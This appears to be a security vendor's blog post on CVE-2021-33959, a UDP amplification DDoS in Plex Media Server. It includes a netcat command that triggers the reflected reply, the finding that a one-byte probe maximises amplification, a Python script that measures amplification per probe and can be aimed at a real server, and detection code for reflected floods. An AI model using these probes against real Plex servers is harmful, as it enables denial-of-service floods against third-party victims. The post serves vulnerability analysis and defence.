In the era of online streaming media, Plex Media Server is a popular and versatile application that lets users organize, manage and stream their personal media (movies, TV shows, music and photos) across multiple devices. It is like having one's own Netflix server, reachable from personal devices such as smartphones, tablets, smart TVs and other streaming devices.
However, that popularity and widespread use also make it an attractive target for attackers. One significant vulnerability affecting Plex Media Server is a UDP amplification (reflection) DDoS attack discovered in 2021 and tracked as CVE-2021-33959.
In this blog we take a closer look at the traffic pattern of this attack, including how to reproduce the vulnerable setup and exploit it.
Vulnerable Setup and Exploitation
According to the information provided by MITRE, Plex Media Server 1.21 and earlier is vulnerable to this DDoS reflection attack. To understand the vulnerability better, the Keysight ATI team deployed a vulnerable environment locally using Plex Media Server version 1.9.5.3112 as the victim, as shown below –
Figure 1: Vulnerable Plex Media Server running on localhost
For the exploitation, we as the attacker send the payload "M-SEARCH * HTTP/1.1" to the vulnerable Plex Media Server on UDP port 32414 (one of the UDP ports Plex uses for GDM network discovery) using the following netcat command on Linux –
echo "M-SEARCH * HTTP/1.1" | nc -u <server_ip> 32414
Note that echo appends a trailing newline to the datagram; use printf instead if you want to send the bare 19-byte payload. Either way, this triggers a UDP response from the server that is significantly larger than the request, as shown below –
Interestingly, we also observed that the server does not require that exact "M-SEARCH * HTTP/1.1" payload. An attacker can send any non-empty prefix of it to the same UDP port 32414, in byte-string form such as "\x4d" ("M"), "\x4d\x2d" ("M-") and so on, and the server still responds.
This indicates that the server starts processing and answering an incomplete or partial UDP request, as shown below –
For this UDP amplification attack the Bandwidth Amplification Factor (BAF) is the size of the UDP payload the server sends back divided by the size of the UDP payload the attacker sends, so it is highest for the shortest request that still triggers the reply (a single byte, as shown above). The maximum BAF we measured is –
Figure 5: Calculation of BAF
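The measurement behind Figure 5 can be scripted. The following is an added example, not code from the blog or from Plex: it starts a small constructed stand-in for the vulnerable server on a loopback ephemeral port (the real service listens on UDP 32414, kept here as the GDM_PORT constant), sends every non-empty prefix of the M-SEARCH payload exactly as described above, and reports the BAF for each. The emulated reply uses the header layout listed in the Attack Traffic Analysis section with placeholder values; the "HTTP/1.0" status line and CRLF line endings are assumptions about the exact wire format, and the prefix-matching rule simply reproduces the behaviour the post observed.

```python
import socket
import threading

PROBE = b"M-SEARCH * HTTP/1.1"   # the payload the post sends with netcat
GDM_PORT = 32414                 # real servers listen here; the demo binds an ephemeral port

# Constructed stand-in for the vulnerable server's reply. All values are
# placeholders, not captured data; "HTTP/1.0" and CRLF endings are assumptions.
EMULATED_REPLY = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: plex/media-server\r\n"
    b"Name: plex-victim\r\n"
    b"Port: 32400\r\n"
    b"Resource-Identifier: 0123456789abcdef0123456789abcdef01234567\r\n"
    b"Updated-At: 1733443200\r\n"
    b"Version: 1.9.5.3112\r\n\r\n"
)


def emulated_server(sock, stop):
    """Answer any datagram whose payload is a non-empty prefix of PROBE,
    reproducing the partial-request behaviour observed on the real server."""
    sock.settimeout(0.2)
    while not stop.is_set():
        try:
            data, peer = sock.recvfrom(2048)
        except socket.timeout:
            continue
        if data and PROBE.startswith(data):
            sock.sendto(EMULATED_REPLY, peer)


def probe(host, port, payload, timeout=1.0):
    """Send one UDP datagram; return (request_bytes, reply_bytes), reply_bytes 0 on silence."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(payload, (host, port))
        try:
            reply, _ = s.recvfrom(65535)
        except socket.timeout:
            return len(payload), 0
    return len(payload), len(reply)


def baf(request_bytes, reply_bytes):
    """Bandwidth amplification factor: reply UDP payload size over request UDP payload size."""
    return reply_bytes / request_bytes if request_bytes else 0.0


def measure_prefixes(host, port):
    """Probe with every non-empty prefix of PROBE; return {prefix: BAF}."""
    return {PROBE[:n]: baf(*probe(host, port, PROBE[:n])) for n in range(1, len(PROBE) + 1)}


def run_demo():
    """Start the emulator on 127.0.0.1, measure the BAF for each prefix, and check
    that a payload which is not a prefix (b"X") gets no reply. Returns (results, silent)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    port = srv.getsockname()[1]
    stop = threading.Event()
    worker = threading.Thread(target=emulated_server, args=(srv, stop), daemon=True)
    worker.start()
    try:
        results = measure_prefixes("127.0.0.1", port)
        _, silent = probe("127.0.0.1", port, b"X")
    finally:
        stop.set()
        worker.join()
        srv.close()
    return results, silent


if __name__ == "__main__":
    results, silent = run_demo()
    for prefix, factor in results.items():
        print(f"{prefix!r:26} BAF = {factor:6.1f}")
    print("non-prefix payload answered:", silent > 0)
```

Because the reply size does not change with the request, the 1-byte prefix yields the largest factor, which is why the single-byte probe matters more for an attacker than the full M-SEARCH string. To repeat the measurement against a lab server you own, point probe() at its address and GDM_PORT instead of the emulator.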
Attack Traffic Analysis
From the captured network traffic we can see that the vulnerable Plex Media Server replies with an HTTP-style 200 OK response carried inside the UDP datagram, as shown below –
This response contains the following headers –
- Content-Type: plex/media-server
- Name: <friendly name of the responding Plex Media Server; in our localhost setup this is the same machine that sent the request>
- Port: 32400 (the TCP port on which the Plex Media Server's HTTP interface listens; the reply advertises it so that a discovering client knows where to connect)
- Resource-Identifier: <unique 20-byte lowercase hexadecimal identifier of the server>
- Updated-At: <UNIX epoch timestamp as an integer>
- Version: <version of the Plex Media Server>
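The header list above is enough to recognise this traffic on the wire. The following is an added example, not Keysight's or Plex's code: it parses a reply in that layout, flags requests that are strict prefixes of M-SEARCH (a genuine Plex client sends the whole string, so a stream of 1-byte probes to UDP 32414 is itself a strong indicator), and groups replies by destination to find hosts that are being flooded by reflected traffic. The packet tuples and the sample reply are constructed; the "HTTP/1.0" status line and CRLF endings are assumptions about the exact wire format, and the threshold of ten replies is an arbitrary demo value.

```python
from collections import defaultdict

GDM_PORT = 32414
PROBE = b"M-SEARCH * HTTP/1.1"

# Constructed sample reply in the header layout described above; placeholder values.
SAMPLE_REPLY = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: plex/media-server\r\n"
    b"Name: plex-victim\r\n"
    b"Port: 32400\r\n"
    b"Resource-Identifier: 0123456789abcdef0123456789abcdef01234567\r\n"
    b"Updated-At: 1733443200\r\n"
    b"Version: 1.9.5.3112\r\n\r\n"
)


def parse_gdm_reply(payload):
    """Return the header dict of a Plex GDM reply, or None if the payload is not one."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    status, _, rest = text.partition("\r\n")
    if not status.startswith("HTTP/") or "200" not in status.split():
        return None
    headers = {}
    for line in rest.split("\r\n"):
        if not line:
            break  # blank line terminates the header block
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip()] = value.strip()
    if headers.get("Content-Type") != "plex/media-server":
        return None
    return headers


def truncated_probe(payload):
    """True for a strict, non-empty prefix of M-SEARCH: the partial requests the post describes."""
    return 0 < len(payload) < len(PROBE) and PROBE.startswith(payload)


def analyse(packets, min_replies=10):
    """packets: iterable of (src_ip, src_port, dst_ip, dst_port, payload).
    Returns ({dst_ip: (reply_count, reply_bytes)} for hosts over the threshold,
    number of truncated probes seen)."""
    replies = defaultdict(lambda: [0, 0])
    truncated = 0
    for src_ip, src_port, dst_ip, dst_port, payload in packets:
        if dst_port == GDM_PORT and truncated_probe(payload):
            truncated += 1
        if src_port == GDM_PORT and parse_gdm_reply(payload) is not None:
            replies[dst_ip][0] += 1
            replies[dst_ip][1] += len(payload)
    victims = {ip: (n, b) for ip, (n, b) in replies.items() if n >= min_replies}
    return victims, truncated


def constructed_capture():
    """Constructed packet list: spoofed 1-byte probes whose replies land on the
    victim, plus one genuine discovery exchange from a normal client."""
    reflector, victim, client = "192.0.2.5", "203.0.113.10", "192.0.2.20"
    pkts = []
    for _ in range(12):
        pkts.append((victim, 40000, reflector, GDM_PORT, b"M"))          # spoofed source
        pkts.append((reflector, GDM_PORT, victim, 40000, SAMPLE_REPLY))  # reflected reply
    pkts.append((client, 40001, reflector, GDM_PORT, PROBE))
    pkts.append((reflector, GDM_PORT, client, 40001, SAMPLE_REPLY))
    return pkts


if __name__ == "__main__":
    victims, truncated = analyse(constructed_capture())
    print("truncated M-SEARCH probes:", truncated)
    for ip, (count, nbytes) in victims.items():
        print(f"{ip}: {count} reflected replies, {nbytes} bytes")
```

On a real capture, feed analyse() the UDP packets from your parser of choice; the reply-count threshold should be tuned to how many Plex servers a host can legitimately discover, while any truncated probe at all is worth alerting on.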
Plex UDP Amplification DDoS Attack Traffic in Keysight ATI
At Keysight Technologies, researchers on our Application and Threat Intelligence (ATI) team have examined the traffic pattern of the Plex UDP amplification DDoS attack and its related strike (CVE-2021-33959) and added support for both to the BreakingPoint System's DDoS Lab and Security components in the ATI-2024-24 StrikePack released on December 06, 2024, as shown below –
Leverage Subscription Service to Stay Ahead of Attacks
Keysight's Application and Threat Intelligence subscription provides daily malware updates and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Centre continuously monitors threats as they appear in the wild. BreakingPoint customers now have access to attack campaigns for different advanced persistent threats, allowing them to test the ability of their currently deployed security controls to detect or block such attacks.